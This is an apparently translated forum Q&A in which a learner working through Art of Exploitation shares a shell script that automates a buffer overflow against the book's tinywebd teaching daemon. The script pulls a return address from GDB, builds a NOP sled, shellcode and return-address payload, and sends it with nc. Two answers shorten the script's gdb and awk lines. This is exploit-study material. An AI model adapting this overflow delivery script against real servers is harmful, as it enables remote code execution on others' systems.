2

要点:这个脚本可以更干净更简洁吗?

所以我正在研究 Erickson 的 Art of Exploitation,他介绍了一种自动化工具的开发,以更快地利用他的 tinywebserver 守护进程。

但是,在 Ubuntu 10.04 上,每次重新启动守护程序时,返回地址都会更改。我调整了脚本以自动从 GDB 获取返回地址。我以前从未编写过任何脚本,下面的脚本可以工作,但我想知道它是否可以更干净,尤其是 GDB 行。

基本上,我启动守护进程,然后获取 pid。然后我自动运行 GDB 以获得正确的返回地址。这将保存到日志文件中。

我使用 cut 获取返回地址,使用 sed 分隔它,并使用 awk 为 shellcode 正确格式化它。

其他一切都来自书中。

关于 gdb 行和 cut/sed/awk 行的任何反馈?

感谢您的任何建议。

#!/bin/sh
# a tool for exploiting tinywebd

if [ -z "$2" ]; then  # if argument 2 is blank
   echo "Usage: $0 <shellcode file> <target IP>"
   exit
fi 

./tinywebd
pid=$(pidof tinywebd)

OFFSET=524  # changed to work on eve

#RETADDR="\xe4\x9a\xd2\xbf" # 
sudo gdb -q -pid=$pid --symbols=./tinywebd --batch -ex "break 86" 
--batch -ex "c"--batch -ex "set logging on gdblog" --batch -ex "x/x request+100"
--batch -ex "set logging off" --batch -ex "quit"

RETADDR=$(cut -d: -f1 gdblog | sed 's/\(.\{2\}\)/\1 /g' | 
awk '{ print "\\x"$5"\\x"$4"\\x"$3"\\x"$2}')
rm -f gdblog

echo "target IP: $2"
SIZE=`wc -c $1 | cut -f1 -d ' '`
echo "shellcode: $1 ($SIZE bytes)"
ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE))

echo "[NOP ($ALIGNED_SLED_SIZE bytes)] [shellcode ($SIZE bytes)] [ret addr ($((4*32)) 
bytes)]"
( perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE";
 cat $1;
 perl -e "print \"$RETADDR\"x32 . \"\r\n\"";) | nc -w 1 -v $2 80
4

2 回答 2

1 
cut -d: -f1 gdblog | sed 's/\(.\{2\}\)/\1 /g' | awk '{ print "\\x"$5"\\x"$4"\\x"$3"\\x"$2}'

似乎相当于 perl one-liner:

perl -ple '$_=join"",map"\\x$_",(/(..)/g)[4,3,2,1]' gdblog
于 2012-08-22T18:59:22.537 回答
1

gdb 行可以缩短:

sudo gdb -batch -ex "break 86" -ex c -ex "set logging on gdblog" -ex "x/x request+100" -ex quit ./tinywebd $pid
  • -batch 意味着 -q 并且只需要一次
  • 最后不需要“设置注销”
  • 可以不带选项指定可执行文件和 PID

如果你的 awk 支持 FIELDWIDTHS 变量,我们可以很容易地不用 cut 和 sed:

RETADDR=$(awk -v FIELDWIDTHS="2 2 2 2 2" '{print "\\x"$5"\\x"$4"\\x"$3"\\x"$2}' gdblog)

或者,即使它没有:

RETADDR=$(awk '{gsub("..", "& "); print "\\x"$5"\\x"$4"\\x"$3"\\x"$2}' gdblog)
于 2013-09-18T13:12:28.667 回答